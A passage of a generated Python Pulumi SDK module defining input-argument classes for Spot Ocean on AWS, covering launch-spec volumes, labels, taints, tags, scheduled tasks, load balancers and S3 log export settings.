    def kms_key_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_key_id", value)

    @property
    @pulumi.getter(name="snapshotId")
    def snapshot_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Optional) String. The Snapshot ID to mount by.
        """
        return pulumi.get(self, "snapshot_id")

    @snapshot_id.setter
    def snapshot_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot_id", value)

    @property
    @pulumi.getter
    def throughput(self) -> Optional[pulumi.Input[int]]:
        """
        The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = `gp3`.
        """
        return pulumi.get(self, "throughput")

    @throughput.setter
    def throughput(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "throughput", value)

    @property
    @pulumi.getter(name="volumeSize")
    def volume_size(self) -> Optional[pulumi.Input[int]]:
        """
        Int. The size, in GB of the volume.
        """
        return pulumi.get(self, "volume_size")

    @volume_size.setter
    def volume_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "volume_size", value)

    @property
    @pulumi.getter(name="volumeType")
    def volume_type(self) -> Optional[pulumi.Input[str]]:
        """
        String. The type of the volume. (Example: `gp2`).
        """
        return pulumi.get(self, "volume_type")

    @volume_type.setter
    def volume_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "volume_type", value)
@pulumi.input_type
class OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs:
    """Dynamic EBS volume sizing: total size grows from `base_size` by
    `size_per_resource_unit` GB per unit of the selected `resource` type."""

    def __init__(__self__, *,
                 base_size: pulumi.Input[int],
                 resource: pulumi.Input[str],
                 size_per_resource_unit: pulumi.Input[int]):
        """
        :param pulumi.Input[int] base_size: Int. Initial size for volume. (Example: 50)
        :param pulumi.Input[str] resource: String. Resource type to increase volume size dynamically by. (Valid values: `CPU`)
        :param pulumi.Input[int] size_per_resource_unit: Int. Additional size (in GB) per resource unit. (Example: `baseSize=50`, `sizePerResourceUnit=20`, and instance with 2 CPU is launched; its total disk size will be: 90GB)
        """
        # All three fields are required.
        pulumi.set(__self__, "base_size", base_size)
        pulumi.set(__self__, "resource", resource)
        pulumi.set(__self__, "size_per_resource_unit", size_per_resource_unit)

    @property
    @pulumi.getter(name="baseSize")
    def base_size(self) -> pulumi.Input[int]:
        """
        Int. Initial size for volume. (Example: 50)
        """
        return pulumi.get(self, "base_size")

    @base_size.setter
    def base_size(self, value: pulumi.Input[int]):
        pulumi.set(self, "base_size", value)

    @property
    @pulumi.getter
    def resource(self) -> pulumi.Input[str]:
        """
        String. Resource type to increase volume size dynamically by. (Valid values: `CPU`)
        """
        return pulumi.get(self, "resource")

    @resource.setter
    def resource(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource", value)

    @property
    @pulumi.getter(name="sizePerResourceUnit")
    def size_per_resource_unit(self) -> pulumi.Input[int]:
        """
        Int. Additional size (in GB) per resource unit. (Example: `baseSize=50`, `sizePerResourceUnit=20`, and instance with 2 CPU is launched; its total disk size will be: 90GB)
        """
        return pulumi.get(self, "size_per_resource_unit")

    @size_per_resource_unit.setter
    def size_per_resource_unit(self, value: pulumi.Input[int]):
        pulumi.set(self, "size_per_resource_unit", value)
@pulumi.input_type
class OceanLaunchSpecCreateOptionsArgs:
    """Options applied when the Virtual Node Group is created."""

    def __init__(__self__, *,
                 initial_nodes: pulumi.Input[int]):
        """
        :param pulumi.Input[int] initial_nodes: When set to an integer greater than 0, a corresponding amount of nodes will be launched from the created Virtual Node Group. The parameter is recommended in case the use_as_template_only (in aws.Ocean resource) is set to true during Ocean resource creation.
        """
        pulumi.set(__self__, "initial_nodes", initial_nodes)

    @property
    @pulumi.getter(name="initialNodes")
    def initial_nodes(self) -> pulumi.Input[int]:
        """
        When set to an integer greater than 0, a corresponding amount of nodes will be launched from the created Virtual Node Group. The parameter is recommended in case the use_as_template_only (in aws.Ocean resource) is set to true during Ocean resource creation.
        """
        return pulumi.get(self, "initial_nodes")

    @initial_nodes.setter
    def initial_nodes(self, value: pulumi.Input[int]):
        pulumi.set(self, "initial_nodes", value)
@pulumi.input_type
class OceanLaunchSpecDeleteOptionsArgs:
    """Options applied when the Virtual Node Group is deleted."""

    def __init__(__self__, *,
                 force_delete: pulumi.Input[bool]):
        """
        :param pulumi.Input[bool] force_delete: When set to `true`, delete even if it is the last Virtual Node Group (also, the default Virtual Node Group must be configured with `useAsTemlateOnly = true`). Should be set at creation or update, but will be used only at deletion.
        """
        pulumi.set(__self__, "force_delete", force_delete)

    @property
    @pulumi.getter(name="forceDelete")
    def force_delete(self) -> pulumi.Input[bool]:
        """
        When set to `true`, delete even if it is the last Virtual Node Group (also, the default Virtual Node Group must be configured with `useAsTemlateOnly = true`). Should be set at creation or update, but will be used only at deletion.
        """
        return pulumi.get(self, "force_delete")

    @force_delete.setter
    def force_delete(self, value: pulumi.Input[bool]):
        pulumi.set(self, "force_delete", value)
@pulumi.input_type
class OceanLaunchSpecElasticIpPoolArgs:
    """Elastic IP pool assignment for the Virtual Node Group."""

    def __init__(__self__, *,
                 tag_selector: Optional[pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs']] = None):
        """
        :param pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs'] tag_selector: A key-value pair, which defines an Elastic IP from the customer pool. Can be null.
        """
        if tag_selector is not None:
            pulumi.set(__self__, "tag_selector", tag_selector)

    @property
    @pulumi.getter(name="tagSelector")
    def tag_selector(self) -> Optional[pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs']]:
        """
        A key-value pair, which defines an Elastic IP from the customer pool. Can be null.
        """
        return pulumi.get(self, "tag_selector")

    @tag_selector.setter
    def tag_selector(self, value: Optional[pulumi.Input['OceanLaunchSpecElasticIpPoolTagSelectorArgs']]):
        pulumi.set(self, "tag_selector", value)
@pulumi.input_type
class OceanLaunchSpecElasticIpPoolTagSelectorArgs:
    """Tag key/value pair used to select Elastic IPs for the pool."""

    def __init__(__self__, *,
                 tag_key: pulumi.Input[str],
                 tag_value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] tag_key: Elastic IP tag key. The Virtual Node Group will consider all Elastic IPs tagged with this tag as a part of the Elastic IP pool to use.
        :param pulumi.Input[str] tag_value: Elastic IP tag value. Can be null.
        """
        # The key is required; the value is optional (selects on key alone).
        pulumi.set(__self__, "tag_key", tag_key)
        if tag_value is not None:
            pulumi.set(__self__, "tag_value", tag_value)

    @property
    @pulumi.getter(name="tagKey")
    def tag_key(self) -> pulumi.Input[str]:
        """
        Elastic IP tag key. The Virtual Node Group will consider all Elastic IPs tagged with this tag as a part of the Elastic IP pool to use.
        """
        return pulumi.get(self, "tag_key")

    @tag_key.setter
    def tag_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "tag_key", value)

    @property
    @pulumi.getter(name="tagValue")
    def tag_value(self) -> Optional[pulumi.Input[str]]:
        """
        Elastic IP tag value. Can be null.
        """
        return pulumi.get(self, "tag_value")

    @tag_value.setter
    def tag_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tag_value", value)
@pulumi.input_type
class OceanLaunchSpecLabelArgs:
    """A Kubernetes label (key/value pair) applied to nodes of the Virtual Node Group."""

    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The label key.
        :param pulumi.Input[str] value: The label value.
        """
        # NOTE(review): the generated docstrings here said "taint key/value",
        # a copy-paste from the taint class; this class models a label.
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        The label key.
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        The label value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class OceanLaunchSpecResourceLimitArgs:
    """Min/max instance-count limits for the Virtual Node Group."""

    def __init__(__self__, *,
                 max_instance_count: Optional[pulumi.Input[int]] = None,
                 min_instance_count: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] max_instance_count: Set a maximum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
        :param pulumi.Input[int] min_instance_count: Set a minimum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
        """
        if max_instance_count is not None:
            pulumi.set(__self__, "max_instance_count", max_instance_count)
        if min_instance_count is not None:
            pulumi.set(__self__, "min_instance_count", min_instance_count)

    @property
    @pulumi.getter(name="maxInstanceCount")
    def max_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        Set a maximum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
        """
        return pulumi.get(self, "max_instance_count")

    @max_instance_count.setter
    def max_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_instance_count", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        Set a minimum number of instances per Virtual Node Group. Can be null. If set, value must be greater than or equal to 0.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class OceanLaunchSpecSchedulingTaskArgs:
    """A cron-scheduled task (e.g. a manual headroom update) for the Virtual Node Group."""

    def __init__(__self__, *,
                 cron_expression: pulumi.Input[str],
                 is_enabled: pulumi.Input[bool],
                 task_type: pulumi.Input[str],
                 task_headrooms: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]]] = None):
        """
        :param pulumi.Input[str] cron_expression: A valid cron expression. For example : " * * * * * ". The cron job runs in UTC time and is in Unix cron format.
        :param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When True, the task runs. When False, it does not run.
        :param pulumi.Input[str] task_type: The activity that you are scheduling. Valid values: "manualHeadroomUpdate".
        :param pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]] task_headrooms: The config of this scheduled task. Depends on the value of taskType.
        """
        # cron_expression, is_enabled, and task_type are required;
        # task_headrooms is only meaningful for headroom-type tasks.
        pulumi.set(__self__, "cron_expression", cron_expression)
        pulumi.set(__self__, "is_enabled", is_enabled)
        pulumi.set(__self__, "task_type", task_type)
        if task_headrooms is not None:
            pulumi.set(__self__, "task_headrooms", task_headrooms)

    @property
    @pulumi.getter(name="cronExpression")
    def cron_expression(self) -> pulumi.Input[str]:
        """
        A valid cron expression. For example : " * * * * * ". The cron job runs in UTC time and is in Unix cron format.
        """
        return pulumi.get(self, "cron_expression")

    @cron_expression.setter
    def cron_expression(self, value: pulumi.Input[str]):
        pulumi.set(self, "cron_expression", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> pulumi.Input[bool]:
        """
        Describes whether the task is enabled. When True, the task runs. When False, it does not run.
        """
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="taskType")
    def task_type(self) -> pulumi.Input[str]:
        """
        The activity that you are scheduling. Valid values: "manualHeadroomUpdate".
        """
        return pulumi.get(self, "task_type")

    @task_type.setter
    def task_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "task_type", value)

    @property
    @pulumi.getter(name="taskHeadrooms")
    def task_headrooms(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]]]:
        """
        The config of this scheduled task. Depends on the value of taskType.
        """
        return pulumi.get(self, "task_headrooms")

    @task_headrooms.setter
    def task_headrooms(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLaunchSpecSchedulingTaskTaskHeadroomArgs']]]]):
        pulumi.set(self, "task_headrooms", value)
@pulumi.input_type
class OceanLaunchSpecSchedulingTaskTaskHeadroomArgs:
    """Headroom configuration applied by a scheduled `manualHeadroomUpdate` task."""

    def __init__(__self__, *,
                 num_of_units: pulumi.Input[int],
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 gpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] num_of_units: The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
        :param pulumi.Input[int] cpu_per_unit: Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
        :param pulumi.Input[int] gpu_per_unit: Optionally configure the number of GPUS to allocate for each headroom unit.
        :param pulumi.Input[int] memory_per_unit: Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
        """
        # num_of_units is required; the per-unit resource amounts are optional.
        pulumi.set(__self__, "num_of_units", num_of_units)
        if cpu_per_unit is not None:
            pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
        if gpu_per_unit is not None:
            pulumi.set(__self__, "gpu_per_unit", gpu_per_unit)
        if memory_per_unit is not None:
            pulumi.set(__self__, "memory_per_unit", memory_per_unit)

    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> pulumi.Input[int]:
        """
        The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
        """
        return pulumi.get(self, "num_of_units")

    @num_of_units.setter
    def num_of_units(self, value: pulumi.Input[int]):
        pulumi.set(self, "num_of_units", value)

    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
        """
        return pulumi.get(self, "cpu_per_unit")

    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)

    @property
    @pulumi.getter(name="gpuPerUnit")
    def gpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        Optionally configure the number of GPUS to allocate for each headroom unit.
        """
        return pulumi.get(self, "gpu_per_unit")

    @gpu_per_unit.setter
    def gpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "gpu_per_unit", value)

    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
        """
        return pulumi.get(self, "memory_per_unit")

    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)
@pulumi.input_type
class OceanLaunchSpecStrategyArgs:
    """Provisioning strategy for the Virtual Node Group."""

    def __init__(__self__, *,
                 spot_percentage: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] spot_percentage: When set, Ocean will proactively try to maintain as close as possible to the percentage of Spot instances out of all the Virtual Node Group instances.
        """
        if spot_percentage is not None:
            pulumi.set(__self__, "spot_percentage", spot_percentage)

    @property
    @pulumi.getter(name="spotPercentage")
    def spot_percentage(self) -> Optional[pulumi.Input[int]]:
        """
        When set, Ocean will proactively try to maintain as close as possible to the percentage of Spot instances out of all the Virtual Node Group instances.
        """
        return pulumi.get(self, "spot_percentage")

    @spot_percentage.setter
    def spot_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "spot_percentage", value)
@pulumi.input_type
class OceanLaunchSpecTagArgs:
    """A resource tag (key/value pair) applied to instances of the Virtual Node Group."""

    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The tag key.
        :param pulumi.Input[str] value: The tag value.
        """
        # NOTE(review): the generated docstrings here said "taint key/value",
        # a copy-paste from the taint class; this class models a tag.
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        The tag key.
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        The tag value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class OceanLaunchSpecTaintArgs:
    """A Kubernetes taint (effect/key/value) applied to nodes of the Virtual Node Group."""

    def __init__(__self__, *,
                 effect: pulumi.Input[str],
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] effect: The effect of the taint. Valid values: `"NoSchedule"`, `"PreferNoSchedule"`, `"NoExecute"`.
        :param pulumi.Input[str] key: The taint key.
        :param pulumi.Input[str] value: The taint value.
        """
        # All three fields are required.
        pulumi.set(__self__, "effect", effect)
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def effect(self) -> pulumi.Input[str]:
        """
        The effect of the taint. Valid values: `"NoSchedule"`, `"PreferNoSchedule"`, `"NoExecute"`.
        """
        return pulumi.get(self, "effect")

    @effect.setter
    def effect(self, value: pulumi.Input[str]):
        pulumi.set(self, "effect", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        The taint key.
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        The taint value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class OceanLaunchSpecUpdatePolicyArgs:
    """Update policy for the launch spec.

    NOTE(review): undocumented in this file — presumably controls whether a
    rolling update of the Virtual Node Group is triggered on spec changes;
    confirm against the Spot Ocean provider docs.
    """

    def __init__(__self__, *,
                 should_roll: pulumi.Input[bool],
                 roll_config: Optional[pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs']] = None):
        """
        :param pulumi.Input[bool] should_roll: Whether to perform a roll on update (NOTE(review): inferred from the name — confirm).
        :param pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs'] roll_config: Optional roll configuration.
        """
        pulumi.set(__self__, "should_roll", should_roll)
        if roll_config is not None:
            pulumi.set(__self__, "roll_config", roll_config)

    @property
    @pulumi.getter(name="shouldRoll")
    def should_roll(self) -> pulumi.Input[bool]:
        return pulumi.get(self, "should_roll")

    @should_roll.setter
    def should_roll(self, value: pulumi.Input[bool]):
        pulumi.set(self, "should_roll", value)

    @property
    @pulumi.getter(name="rollConfig")
    def roll_config(self) -> Optional[pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs']]:
        return pulumi.get(self, "roll_config")

    @roll_config.setter
    def roll_config(self, value: Optional[pulumi.Input['OceanLaunchSpecUpdatePolicyRollConfigArgs']]):
        pulumi.set(self, "roll_config", value)
@pulumi.input_type
class OceanLaunchSpecUpdatePolicyRollConfigArgs:
    """Roll configuration for the launch spec update policy.

    NOTE(review): undocumented in this file — `batch_size_percentage`
    presumably sets the percentage of instances replaced per roll batch;
    confirm against the Spot Ocean provider docs.
    """

    def __init__(__self__, *,
                 batch_size_percentage: pulumi.Input[int]):
        """
        :param pulumi.Input[int] batch_size_percentage: Percentage per roll batch (NOTE(review): inferred from the name — confirm).
        """
        pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)

    @property
    @pulumi.getter(name="batchSizePercentage")
    def batch_size_percentage(self) -> pulumi.Input[int]:
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: pulumi.Input[int]):
        pulumi.set(self, "batch_size_percentage", value)
@pulumi.input_type
class OceanLoadBalancerArgs:
    """A load balancer attached to the Ocean cluster, identified either by
    name (CLASSIC) or by target-group ARN (TARGET_GROUP)."""

    def __init__(__self__, *,
                 arn: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] arn: Required if type is set to `TARGET_GROUP`
        :param pulumi.Input[str] name: Required if type is set to `CLASSIC`
        :param pulumi.Input[str] type: Can be set to `CLASSIC` or `TARGET_GROUP`
        """
        # The arn/name requirement depends on `type`; this constructor does
        # not enforce it — validation happens provider-side.
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        Required if type is set to `TARGET_GROUP`
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Required if type is set to `CLASSIC`
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        Can be set to `CLASSIC` or `TARGET_GROUP`
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class OceanLoggingArgs:
    """Logging configuration for the Ocean cluster."""

    def __init__(__self__, *,
                 export: Optional[pulumi.Input['OceanLoggingExportArgs']] = None):
        """
        :param pulumi.Input['OceanLoggingExportArgs'] export: Logging Export configuration.
        """
        if export is not None:
            pulumi.set(__self__, "export", export)

    @property
    @pulumi.getter
    def export(self) -> Optional[pulumi.Input['OceanLoggingExportArgs']]:
        """
        Logging Export configuration.
        """
        return pulumi.get(self, "export")

    @export.setter
    def export(self, value: Optional[pulumi.Input['OceanLoggingExportArgs']]):
        pulumi.set(self, "export", value)
@pulumi.input_type
class OceanLoggingExportArgs:
    """Export destinations for cluster logs."""

    def __init__(__self__, *,
                 s3s: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]] s3s: Exports your cluster's logs to the S3 bucket and subdir configured on the S3 data integration given.
        """
        if s3s is not None:
            pulumi.set(__self__, "s3s", s3s)

    @property
    @pulumi.getter
    def s3s(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]]]:
        """
        Exports your cluster's logs to the S3 bucket and subdir configured on the S3 data integration given.
        """
        return pulumi.get(self, "s3s")

    @s3s.setter
    def s3s(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoggingExportS3Args']]]]):
        pulumi.set(self, "s3s", value)
@pulumi.input_type
class OceanLoggingExportS3Args:
    """An S3 data-integration target for log export."""

    def __init__(__self__, *,
                 id: pulumi.Input[str]):
        """
        :param pulumi.Input[str] id: The identifier of The S3 data integration to export the logs to.
        """
        # `id` shadows the builtin, but the generated-SDK interface fixes the name.
        pulumi.set(__self__, "id", id)

    @property
    @pulumi.getter
    def id(self) -> pulumi.Input[str]:
        """The identifier of The S3 data integration to export the logs to."""
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: pulumi.Input[str]):
        pulumi.set(self, "id", value)
@pulumi.input_type
class OceanScheduledTaskArgs:
    """Scheduling configuration (shutdown hours and tasks) for the cluster."""

    def __init__(__self__, *,
                 shutdown_hours: Optional[pulumi.Input['OceanScheduledTaskShutdownHoursArgs']] = None,
                 tasks: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]]] = None):
        """
        :param pulumi.Input['OceanScheduledTaskShutdownHoursArgs'] shutdown_hours: Set shutdown hours for cluster object.
        :param pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]] tasks: The scheduling tasks for the cluster.
        """
        # Forward only the attributes the caller actually supplied.
        for attr, val in (("shutdown_hours", shutdown_hours), ("tasks", tasks)):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter(name="shutdownHours")
    def shutdown_hours(self) -> Optional[pulumi.Input['OceanScheduledTaskShutdownHoursArgs']]:
        """Set shutdown hours for cluster object."""
        return pulumi.get(self, "shutdown_hours")

    @shutdown_hours.setter
    def shutdown_hours(self, value: Optional[pulumi.Input['OceanScheduledTaskShutdownHoursArgs']]):
        pulumi.set(self, "shutdown_hours", value)

    @property
    @pulumi.getter
    def tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]]]:
        """The scheduling tasks for the cluster."""
        return pulumi.get(self, "tasks")

    @tasks.setter
    def tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]]]):
        pulumi.set(self, "tasks", value)
@pulumi.input_type
class OceanScheduledTaskShutdownHoursArgs:
    """Shutdown-hours windows for the cluster's scheduled tasks."""

    def __init__(__self__, *,
                 time_windows: pulumi.Input[Sequence[pulumi.Input[str]]],
                 is_enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] time_windows: Set time windows for shutdown hours. Specify a list of `timeWindows` with at least one time window Each string is in the format of: `ddd:hh:mm-ddd:hh:mm` where `ddd` = day of week = Sun | Mon | Tue | Wed | Thu | Fri | Sat, `hh` = hour 24 = 0 -23, `mm` = minute = 0 - 59. Time windows should not overlap. Required if `cluster.scheduling.isEnabled` is `true`. (Example: `Fri:15:30-Wed:14:30`).
        :param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object.
        """
        pulumi.set(__self__, "time_windows", time_windows)
        # Optional flag is forwarded only when supplied.
        if is_enabled is not None:
            pulumi.set(__self__, "is_enabled", is_enabled)

    @property
    @pulumi.getter(name="timeWindows")
    def time_windows(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """Set time windows for shutdown hours. Specify a list of `timeWindows` with at least one time window Each string is in the format of: `ddd:hh:mm-ddd:hh:mm` where `ddd` = day of week = Sun | Mon | Tue | Wed | Thu | Fri | Sat, `hh` = hour 24 = 0 -23, `mm` = minute = 0 - 59. Time windows should not overlap. Required if `cluster.scheduling.isEnabled` is `true`. (Example: `Fri:15:30-Wed:14:30`)."""
        return pulumi.get(self, "time_windows")

    @time_windows.setter
    def time_windows(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "time_windows", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object."""
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class OceanScheduledTaskTaskArgs:
    """A single scheduled task (e.g. a cluster roll) for the cluster."""

    def __init__(__self__, *,
                 cron_expression: pulumi.Input[str],
                 is_enabled: pulumi.Input[bool],
                 task_type: pulumi.Input[str]):
        """
        :param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of `frequency` or `cronExpression` should be used at a time. Required for `cluster.scheduling.tasks` object. (Example: `0 1 * * *`).
        :param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object.
        :param pulumi.Input[str] task_type: Valid values: `clusterRoll`. Required for `cluster.scheduling.tasks` object. (Example: `clusterRoll`).
        """
        # All three attributes are required; forward each unconditionally.
        for attr, val in (("cron_expression", cron_expression),
                          ("is_enabled", is_enabled),
                          ("task_type", task_type)):
            pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter(name="cronExpression")
    def cron_expression(self) -> pulumi.Input[str]:
        """A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of `frequency` or `cronExpression` should be used at a time. Required for `cluster.scheduling.tasks` object. (Example: `0 1 * * *`)."""
        return pulumi.get(self, "cron_expression")

    @cron_expression.setter
    def cron_expression(self, value: pulumi.Input[str]):
        pulumi.set(self, "cron_expression", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> pulumi.Input[bool]:
        """Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object."""
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="taskType")
    def task_type(self) -> pulumi.Input[str]:
        """Valid values: `clusterRoll`. Required for `cluster.scheduling.tasks` object. (Example: `clusterRoll`)."""
        return pulumi.get(self, "task_type")

    @task_type.setter
    def task_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "task_type", value)
@pulumi.input_type
class OceanTagArgs:
    """A key/value tag attached to the Ocean cluster."""

    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The tag key.
        :param pulumi.Input[str] value: The tag value.
        """
        # Both attributes are required; forward each unconditionally.
        for attr, val in (("key", key), ("value", value)):
            pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """The tag key."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """The tag value."""
